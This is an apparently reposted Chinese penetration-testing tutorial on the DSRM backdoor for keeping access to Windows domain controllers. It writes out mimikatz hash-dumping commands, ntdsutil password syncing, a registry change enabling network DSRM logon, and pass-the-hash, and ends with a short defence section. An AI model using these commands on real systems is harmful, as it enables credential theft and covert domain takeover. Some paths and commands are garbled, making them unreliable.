DSRM后门——域渗透

admin 2025年2月15日23:44:11评论4 views字数 1988阅读6分37秒阅读模式

声明

以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

0x01 DSRM介绍

目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器域控制器的安全模式启动选项。
域控制器的本地账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。如果DSRM密码忘了,可以使用命令行工具NTDSUtil进行更改。
DSRM 对域环境的持久化操作目前只能在安装KB96-1320的windows -server2008及以后版本,windows server2003 不能使用此方法。
每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM 账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。

0x02 NTLM获取

1、域用户NTLM的获取
使用 mimikatz 查看域内用户test的 NTLM hash,在域控制器中打开 mimikatz,分别输入如下命令:
mimikatz privilege::debugmimikatz lsadump::lsa /patch /name:tes
DSRM后门——域渗透
2、本地管理员的 NTLM Hash获取
在域控制器中打开 mimikatz,分别输入如下命令:
mimikatz token::elevate
DSRM后门——域渗透
mimikatz lsadump::sam(前提条件需要提高注册表的权限:注册表——编辑——权限——选择Administrator——勾选完全控制)
DSRM后门——域渗透
本地管理员账号也就是 DSRM 账号的 NTLM Hash 为:
77fab6cbc3fedeefbc8941b1e067b-925

0x03 同步NTLM Hash

1、将DSRM账号和域内用户的NTLM Hash同步
打开 ntdsutil:
Cmd:>NTDSUTIL
修改 DSRM 的密码:
Cmd:>set DSRM password
使DSRM的密码和指定域用户的密码同步:
Cmd:>sync from domain account 
域用户名字输入q推出
DSRM后门——域渗透
2、重新抓取DSRM密码
mimikatz lsadump::sam
发现DSRM的NTLM Hash已经变成域内用户的NTLM Hash了
DSRM后门——域渗透

0x04 漏洞利用

1、修改 DSRM 的登录方式
DSRM 有三种登录方式,具体如下:
  • 0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号
  • 1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器
  • 2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
在Windows Server 2000以后的版本操作系统中,对 DSRM 使用控制台登录域控制器进行了限制。
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
(1)修改注册表
reg add "HKLMSystemCurrentControlSetControlLsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(2)PowerShell:
New-ItemProperty “hklm:systemcurrentcontrolsetcontrollsa”-name“dsrmadminlogonbehavior” -value 2 -propertyType DWORD
2、使用DSRM远程登录
在其他域成员机器上使用DSRM进行远程登陆
mimikatz privilege::debugmimikatz sekurlsa::pth /domain:域名 /user:用户名 /ntlm: 4c56fc74829fff69deb6c6135c43bf71
成功后会弹出一个弹框,从而达到权限维持的目的
DSRM后门——域渗透
3、验证
dir \OWAC$
DSRM后门——域渗透

0x05 防御

1、定期检查注册表中用于控制DSRM登录方式的键值
HKLMSystemCurrentControlSetControlLsaDsrmAdminLogonBehavior
确认该兼职为1,或者删除该键值
2、定期修改域中所有域控制器的DSRM账号
3、经常检查ID 为4794的日志。尝试设置活动目录服务还原模式的管理员密码会被记录在4794日志中

0x06 参考链接

https://blog.csdn.net/qq_43645782/article/details/116944258
DSRM后门——域渗透
DSRM后门——域渗透
DSRM后门——域渗透

▇ 扫码关注我们 ▇

长白山攻防实验室

学习最新技术知识

原文始发于微信公众号(长白山攻防实验室):DSRM后门——域渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日23:44:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DSRM后门——域渗透http://cn-sec.com/archives/1076202.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息